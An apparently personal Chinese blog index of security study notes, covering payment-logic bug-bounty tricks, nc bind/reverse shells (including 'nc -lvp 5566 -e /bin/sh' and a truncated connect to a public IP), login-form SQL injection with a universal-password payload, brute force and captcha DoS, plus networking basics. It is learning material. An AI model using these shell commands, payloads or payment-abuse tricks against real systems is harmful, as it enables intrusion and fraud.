yawataa的安全学习博客

这个帖子就记录一下最近的规划吧 1.重走web路，再次夯实基础 2.每天看一节src挖掘视频，并做好笔记法博客（12024年11月15日偷懒了，看八奈见杏菜去了） 3.学习剪辑技能（因为想剪关于八奈见的视频） 4.补齐python最后一块拼图，从寒假开始写一些工具。 5.寒假准备考取nisp二级，和拿一个edusrc证书。 6.捡回ai翻唱技术（之前做过一段时间，也发了视频，但是还是太懒了没碰了），一切都是为了八奈见好吧 7.网络技术开始着手准备。 （确确实实我把老八纳入了规划当中，在此之前我还没有这个想法，不过嘛，因为还是年轻，少年人的热爱在这，宁愿做到最好。累点无所谓的。） 补一个小作文（我感觉我已经下头昏了）： 网上看到一种说法，说日本人看到烟花就会想起夏天，夏日祭和烟花大会，夏季和服还有小金鱼;而中国人看到烟花就会感到寒风灌进鼻腔，想起热腾腾的饭菜和排骨汤一该过年了 。我觉得他说的很有道理。我还记得小时候玩烟花，都是穿着厚厚的棉袄。这也是中国人民的传统智慧一穿着厚衣服，可以玩烟花对射，被打到也不疼，就是容易把新衣服烧个窟窿，然后回家挨揍。我第一次见到八奈见杏菜的时候一尽管当时我 ...

看的是月神师傅的视频。 BV1SNyAYGEtF 一，支付漏洞1.支付金额溢出int类型最大值为2147483647 超过这个值后，会从0开始计算，那么2147483649=1 利用方式： 1.直接修改充值金额 2.通过计算来获得，比如我买一个物品，购买很多个，让它的总价超过2147483647，那么价格就会重置从0开始计算 2.小数需要注意哪些点？1.有可能买1.49个商品的时候，变成支付1个的价钱(充值这些可能会遇见。充q币啊，话费啊这种类型，游戏遇到的比较多。) 0.019=0.01 3.重复购买限购商品比如一个案列：假如有一个电视的一块钱购买会员的活动，然后有一个二维码，先拿一个手机扫了过后进入待支付页面，再拿几个手机扫码进入待支付页面，然后再把那些订单支付，有可能就会重复购买商品。 或者是：有新人优惠的时候，先登录一个手机，拿到微信待支付界面，然后换一个手机顶号登录，再次进入这个页面的时候可能还能看见新人优惠，再次支付宝支付，如果没有做校验的话，就可能直接拿到两个月的优惠。 还有类似qq会员升级，vip升级svip，也可以卡这个界面。 一切的新用户优惠 ...

文件上传下载：目的：解决无图形化和数据传输 我们常规下载文件就是访问网址下载，但是在安全测试过程中，有很多情况下没有图形化操作（只是一个执行命令的shell），这也是一个必备的一个技能 可以利用棱角社区生成下载命令（多种方式的命令） [~]#棱角 ::Edge.Forum* (ywhack.com) C:\inetpub\wwwroot（windows一般网站目录都在这） 反弹shell我们用的工具是nc（linux自带，windows需要下载） 为什么需要反弹？？有些命令需要交互式才能进行，像冰蝎那种后门的shell，是没有交互的，遇到交互的命令，会卡住。 一般用外网机器对内网机器进行访问时，多用反向shell，内网机器与内网机器之间多用正向shell 知识点： 1.正向连接和反向连接假如有两台主机，主机a和主机b，我想要a去控制b，那么a主动去连接b，就是正向连接。 b找到a把数据发送给a，a连接到b，就叫反向连接。 正向连接：本地监听，等待连接 被控制主机执行 1nc -lvp 5566 -e /bin/sh （绑定本地的5566端口） 攻击机执行 1nc 47.237.11 ...

当信息收集完，面对的第一个页面大部分都是登录框，那么登录框应该怎么测试呢？ 视频：B站 BV19RDzYKEsk 一.登录框1 1.首先，用户和密码地方，可以尝试万能密码。（其他形式的万能密码我就不写了吧） 1admin' or '1' ='1 基础的登录框是这么写的 select xx where name=’admin’ or ‘1’=1’ 恒为真，就可以登录，在这后也可以测试一个sql注入 2.验证码存在一直有效的话，也可以进行一个爆破 3.记住我，这个看看是不是shiro框架（看看有无rememberMe这个字段） 4.可以看看api接口未授权访问（find something插件），或者是查看页面源码看看有没有信息泄露 5.验证码dos（改返回包的验证码大小，验证码的生成也是需要时间和服务器的资源） 二.登录框2 这个页面思路和上面一样，只不过没有验证码，可以尝试一个爆破，同时多了一个功能点 “忘记密码” 看看重置密码的时候，看看可不可以一个水平越权+任意重置密码 三.登录框3 这个登录框功能更多了，在之前的思路 ...

网站四大件操作系统-中间件-数据库-网站源码 常规web搭建1.购买服务器和域名 2.在服务器上搭建中间件 3.下载并上传web程序源码 4.添加网站并绑定域名 常规搭建模式子域名模式 端口模式 目录模式 其他搭建网站：集成软件搭建（宝塔，phpstudy，这种如果软件出问题了，网站就出问题了。） docker搭建 分配站搭建（大域名分配给用户，比如网校系统，慕课和超星的网上学习就是这样） 源码：开源 商业（闭源） 自写 就个人用户使用，开源免费和使用方便。（安全系数很低，因为源码都是开源的） 开源：源码可见 源码不可见：1.源码加密 2.语言特性 闭源：想定制功能就花钱，定制商业的 自写：而大公司那些，都是自写的（src那些大部分目标） 网站的一个权限：解析访问： 如果不给你执行权限，那么后门脚本就没有用处，后门的所在文件夹需要执行权限，但是基本不会这么设置，只会锁图片目录（因为图片不影响），其他文件锁了会影响网站的执行 非常规搭建站库分离：网站和数据库是分离的（当今流行的微服务架构，一般是内网不同机交互，所以速度也不会慢） 如果放到本地，拿到网站权限就可以拿到数据 但是放到外 ...

什么是路由？路由：把用户数据从一个网络发送到另一个网络 路由器核心目的：数据转发，选择最佳路径转发 怎么选择出的最优路径呢？？基于路由表选出最佳路径，然后再进行数据的转发 什么是路由表？路由器的最核心的一个功能 路由表：路由信息存储在路由表中 路由表是路由器转发数据的依据 查看路由表：dis ip routing-table 一些相关的协议：direct 直接连接的 static 静态 手动向路由表添加目的网段 动态路由协议： rip用于小型网络） ospf 优先级（管理距离）：越小越优，static 60，rip100，direct 0 ospf 10 华为体系 思科体系：direct 0，static 1，ospf 110， rip 120 cost：也叫做开销值，经过路由器的个数，谁经过越少，开销值小 不同协议比较优先级，相同协议比较开销值，不同协议比较开销值没意义 下一跳：给流量走向指向方向 interface： Destination目的网段 路由优选：• 到达同一个目标网络可能有多个路由源、多条路径 网络号相同、子网掩码相同 只有最佳路由才会进入路由表 • ...

我们继续讲ip地址 Ip地址的数量为：2*n-2（其中n位主机位数） Ip地址的范围为网络地址+1，主机地址-1 网络地址为网络位不变，主机位全为0，主机地址为：网络位不变，主机地址全为1。 Ip地址的分类（按类型分） A类（8位网络位，24位主机位），一般用在数据中心 固定头位为0 0.0.0.0-127.255.255.255 B****类 16位网络位，16位主机位 学校 固定头位10 范围128.0.0.0-223.255.255.255 b类网段 C****类：网络位 24 主机位8 固定头部为110，范围 192.0.0.0-223.255.255.255 家庭网络 A,B,C三类一般拿来给人们正常使用 d类组播 E类保留做科研 Ip地址的分类（按公有和私有分） 私有ip： 10.0.0.0-10.255.255.255 172.16.0.0-172.31.255.255 192.168.0.0-192.168.255.255 特殊ip:127.0.0.1–127.255.255 本地测试地址 0.0.0.0代表全网 255.255.255.255 代表0.0.0.0的 ...

数据链路层 数据链路层的作用无论是在OSI七层模型和TCP/IP四层模型里面，作用都是mac寻址。 这一层的作用就是封装目的mac和源mac的。并且这一层由数据包变为了，数据帧。 这一层具有两个协议：Ethernet_II（我们最常用）和IEEE802.3 区别：这两个协议报头有一个字段不同，Ethernet_all是type字段，IEEE802.3是Length字段 那么区分这两种协议的方法就是：看Length/Type字段的长度 Length/Type:>=1536 以太网二代协议 Length/Type：<=1500 IEEE802.3协议 因为我们的以太网二代，最常用然后我们就详细讲以太网二代协议 为什么网络层和以上的层都叫报头，而到数据链路层就称为帧？ 解：*1.”帧”强调的是数据链路层的完整数据结构，包括控制信息和数据负载* ”报头”****则是指数据包控制信息部分，强调的是协议的上下文。 Mac层使用帧这一术语是因为它代表数据链路层的完整封装单位，而不仅仅是控制信息。这个命名反映了不同网络层次的 ...

上一章讲完了传输层的TCP/UDP协议和报文 这一篇就开始讲网络层的ip镞协议了 Ip镞协议包含两个：ICMP和arp协议 首先看IP报文吧，之后具体讲协议 Ip报文的总长度 下面开始挨个介绍报文里面的内容： 版本：ipv4或ipv6版本， ipv4报头长度：报头长度=默认长度（20）+选项长度（0-40）=20-60 服务类型：Q/S 流量控制 基本废弃了 总长度：首部长度+数据区长度 标识符：类似于数据包编号（分包过后标识符那些包标识符都一样） 标志（3位）:标志位 第一位:没用 第二位：看是否分片（0/1 0分片 ，1不分片） 第三位：用来表示后面有无分片 （0代表后面没有分片 1代表后面有分片） 注：第二位和第三位代表的意义是相反的 片偏移：拿来定位的，对分片数据包进行排序 生存时间（TTL）：默认是255，经过一个路由器减一 作用是：防止环路（以后会再学） 协议：区分上层应用 如果传输层位TCP 则数字为·6 如果传输层协议为UDP 则为17 报头校验和：一样的检测数据包是否正确，有没有被修改。 源ip：自己输入或者是软 ...

首先补充一下每一层协议相对应的端口（很重要） 应用层协议端口号：http （80 tcp的80）https（443/tcp） 电子邮箱协议：pop3（tcp 110 ） smtp(tcp 25) 文本传输协议（ftp 20 21/tcp ）,tftp(udp 69) 远程控制服务（telnet 23 ssh 22 Rdp 3389） 域名解析协议：dns:tcp/udp 53 TCP 16位源端口（大于1023的） 16位目的端口（根据协议选择目的端口，如果对方是http协议 这里就是80端口） 疑惑：那么为什么源端口是随机的呢？？？不能是80？？这样不是更容易记住吗？？？ 解:因为源端口也和目的端口一样，要考虑到端口占用的问题，比如如果想要访问对方80端口，自己本身也开了http服务，如果源端口也为80，那么http访问http？这是行不通的。 之所以要大于1023，因为在这之下的端口都基本已经被其他常用协议使用了。 32位序列号：当数据过大时就会将数据进行分包，对方收到这一系列数据包过后，按照序列进行一一排序最后得到完整的数据包，体现出TCP ...